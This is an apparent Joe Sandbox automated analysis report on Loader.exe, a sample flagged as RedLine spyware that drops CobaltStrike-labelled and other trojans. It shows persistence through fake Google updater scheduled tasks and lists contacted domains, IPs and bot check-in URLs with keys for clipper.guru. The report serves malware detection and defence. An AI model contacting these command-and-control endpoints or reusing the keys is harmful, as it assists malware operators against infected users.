.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Loader.exe	65%	ReversingLabs	Win32.Spyware.RedLine
Loader.exe	61%	Virustotal		Browse
Loader.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\3A08.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\3A08.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	81%	ReversingLabs	Win64.Trojan.CobaltStrike
C:\Users\user\AppData\Local\Microsoft\brave.exe	85%	ReversingLabs	Win64.Trojan.CobaltStrike
C:\Users\user\AppData\Local\Microsoft\ofg.exe	65%	ReversingLabs	Win64.Trojan.Tasker
C:\Users\user\AppData\Local\Microsoft\ofg.exe	20%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\setup.exe	38%	ReversingLabs	Win32.Trojan.Phonzy
C:\Users\user\AppData\Local\Microsoft\setup.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\3A08.tmp	81%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\3A08.tmp	32%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsd7E6A.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsd7E6A.tmp\nsExec.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	65%	ReversingLabs	Win64.Trojan.Tasker
C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	20%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.2.svcupdater.exe.19c33010000.2.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
47.0.dialer.exe.7ff7fdb70000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
47.2.dialer.exe.7ff7fdb70000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
47.0.dialer.exe.7ff7fdb70000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
ezisc.com	0%	Virustotal		Browse
clipper.guru	9%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23	0%	URL Reputation	safe
http://clipper.guru/bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46	100%	Avira URL Cloud	phishing
http://tempuri.org/Entity/Id24	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
https://ezisc.com4tkh	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
https://ezisc.com/sdfs34nh.hjhk	0%	Avira URL Cloud	safe
https://ezisc.com/dmi1dfg7n.iujgy	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
https://ezisc.com4tkDt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ezisc.com	35.213.155.151	true	false	0%, Virustotal, Browse	unknown
clipper.guru	45.159.189.115	true	false	9%, Virustotal, Browse	unknown
pool.hashvault.pro	45.76.89.70	true	false		high
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://clipper.guru/bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46	true	Avira URL Cloud: phishing	unknown
https://ezisc.com/sdfs34nh.hjhk	false	Avira URL Cloud: safe	unknown
https://ezisc.com/dmi1dfg7n.iujgy	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faulth	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id7	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ezisc.com4tkh	AppLaunch.exe, 00000002.00000002.416153323.00000000072BA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.540444937.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	Loader.exe, Loader.exe, 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp, Loader.exe, 00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/sc	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	setup.exe, 00000015.00000000.389861129.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, setup.exe, 00000015.00000002.531824079.000000000040A000.00000004.00000001.01000000.0000000E.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	AppLaunch.exe, 00000002.00000002.417833586.0000000007369000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id18	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ezisc.com4tkDt	AppLaunch.exe, 00000002.00000002.415836138.00000000072A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1	AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.159.189.115	clipper.guru	Netherlands	14576	HOSTING-SOLUTIONSUS	false
35.213.155.151	ezisc.com	United States	15169	GOOGLEUS	false
79.137.204.112	unknown	Russian Federation	42569	PSKSET-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	740449
Start date and time:	2022-11-07 23:47:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Loader.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@69/28@8/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 99.2% (good quality ratio 92.5%) Quality average: 77.5% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 99% Number of executed functions: 220 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
Execution Graph export aborted for target AppLaunch.exe, PID 100012 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:48:43	API Interceptor	147x Sleep call for process: AppLaunch.exe modified
23:49:03	Task Scheduler	Run new task: ipNnOYSRDI path: "C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe"
23:49:07	API Interceptor	1x Sleep call for process: brave.exe modified
23:49:09	API Interceptor	166x Sleep call for process: powershell.exe modified
23:50:11	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.159.189.115	AQjjTzMuUR.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	AJ46HzaAxk.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
	Installer.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
	file.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
	ndkqXR67bn.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	wrUTQGEVDe.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	kKniUlCxJc.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
	IVO2cpEukR.exe	Get hash	malicious	Browse	clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
	UQXEEX5Knp.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=965969&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	9x5WDCFiR3.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=897506&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
	47lBopdvBQ.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=347688&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
